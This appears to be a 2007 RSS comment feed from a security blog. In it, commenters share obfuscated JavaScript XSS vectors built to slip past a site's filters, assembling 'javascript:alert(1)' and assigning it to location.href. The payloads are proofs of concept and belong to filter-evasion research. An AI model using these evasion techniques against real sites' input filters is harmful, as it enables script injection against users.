Comments on: So you think you’re a hacker? http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/ A tool for designers dealing with programmers dealing with designers... Tue, 14 Oct 2008 02:02:41 +0000 http://wordpress.org/?v=2.6.2 By: Gareth Heyes http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-613 Gareth Heyes Tue, 18 Sep 2007 01:34:30 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-613 This one took ages cause it's really tough now with their new filters:- s=function test2() {return 'hrefjavascriptalert(1)a';1,1}(); void(a = {} ); void(c = URL ); a.c=function xyz() {return c[4] }(); a.h1=function xyz() {return s[0] }(); a.h2=function xyz() {return s[1] }(); a.h3=function xyz() {return s[2] }(); a.h4=function xyz() {return s[3] }(); a.u1=function xyz() {return s[4] }(); a.u2=function xyz() {return s[5] }(); a.u3=function xyz() {return s[6] }(); a.u4=function xyz() {return s[7] }(); a.u5=function xyz() {return s[8] }(); a.u6=function xyz() {return s[9] }(); a.u7=function xyz() {return s[10] }(); a.u8=function xyz() {return s[11] }(); a.u9=function xyz() {return s[12] }(); a.u10=function xyz() {return s[13] }(); a.u11=function xyz() {return s[14] }(); a.u12=function xyz() {return s[15] }(); a.u13=function xyz() {return s[16] }(); a.u14=function xyz() {return s[17] }(); a.u15=function xyz() {return s[18] }(); a.u16=function xyz() {return s[19] }(); a.u17=function xyz() {return s[20] }(); a.u18=function xyz() {return s[21] }(); $_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }(); for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_; This one took ages cause it’s really tough now with their new filters:-

s=function test2() {return ‘hrefjavascriptalert(1)a’;1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-592 Gareth Heyes Tue, 11 Sep 2007 10:09:52 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-592 This one's awesome :D _=alert,1,1,_(1); This one’s awesome :D
_=alert,1,1,_(1);

]]> By: Ronald http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-575 Ronald Mon, 10 Sep 2007 01:50:11 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-575 It is here: http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html Be amazed what the 'ol netscape can learn us, it's almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff. :D It is here:

http://devedge-temp.mozilla.org/library/manuals/2000/javascript/1.3/guide/sec.html

Be amazed what the ‘ol netscape can learn us, it’s almost forbidden knowledge. I read the whole book over the weekend, learned tons of new and old stuff.

:D

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-573 Gareth Heyes Sun, 09 Sep 2007 21:42:00 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-573 Found any docs on that? I would be interested to read, I tried Mozilla but there's not much stuff on it. Found any docs on that? I would be interested to read, I tried Mozilla but there’s not much stuff on it.

]]> By: Ronald http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-572 Ronald Sun, 09 Sep 2007 21:05:27 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-572 I meant: import function() or var export function() or var Like: function a() { //foo } export a; misleading stuff I know :) I meant:

import function() or var

export function() or var

Like:

function a() {

//foo

}

export a;

misleading stuff I know :)

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-571 Gareth Heyes Sun, 09 Sep 2007 18:42:13 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-571 Definitely an arms race, I just can't see how they can prevent all of it because we can always come up with new ways of doing things. Still I'm impressed with their filters it isn't that easy to come up with new vectors and I've done loads of complicated ones which don't get through. Definitely an arms race, I just can’t see how they can prevent all of it because we can always come up with new ways of doing things.

Still I’m impressed with their filters it isn’t that easy to come up with new vectors and I’ve done loads of complicated ones which don’t get through.

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-570 Gareth Heyes Sun, 09 Sep 2007 18:31:50 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-570 <pre lang="javascript"> c4=1==1&&'(1)';c3=1==1&&'aler'; c2=1==1&&':';c1=1==1&&'javascript'; a=c1+c2+c3+'t'+c4;(URL=a); </pre> 
c4=1==1&&'(1)';c3=1==1&&'aler';
c2=1==1&&':';c1=1==1&&'javascript';
a=c1+c2+c3+'t'+c4;(URL=a);
]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-567 Gareth Heyes Sun, 09 Sep 2007 09:03:54 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-567 Nope didn't know that but sounds cool, I'm gonna google it. Nope didn’t know that but sounds cool, I’m gonna google it.

]]> By: Ronald http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-566 Ronald Sat, 08 Sep 2007 22:45:29 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-566 Yeah I think this will be an endless armsrace :D btw do you know the Javascript functions: import() and export() ? It's pretty cool cause you can export singed script data if import is called inside a signed script. I didn't know this, there is a lot more to be learned in Javascript. Yeah I think this will be an endless armsrace :D

btw do you know the Javascript functions:

import() and export() ? It’s pretty cool cause you can export singed script data if import is called inside a signed script. I didn’t know this, there is a lot more to be learned in Javascript.

]]> By: Gareth Heyes http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-565 Gareth Heyes Sat, 08 Sep 2007 18:43:02 +0000 http://www.thespanner.co.uk/2007/09/04/so-you-think-youre-a-hacker/#comment-565 Here's my favorite:- <pre lang="javascript"> x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/+'';j=s[1]+s[2]+s[3]+s[4]+s[5] +s[6]+s[7]+s[8]+s[9]+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j </pre> Here’s my favorite:-

x=(this);c=1==1&&':';s=''+/javascriptaaalerta(1)ahrefa/+'';j=s[1]+s[2]+s[3]+s[4]+s[5]
+s[6]+s[7]+s[8]+s[9]+s[10]+c+s[12]+s[14]+s[15]+s[16]+s[17]+s[19]+s[20]+s[21];h=s[23]+s[24]+s[25]+s[26];x[h]=j
]]>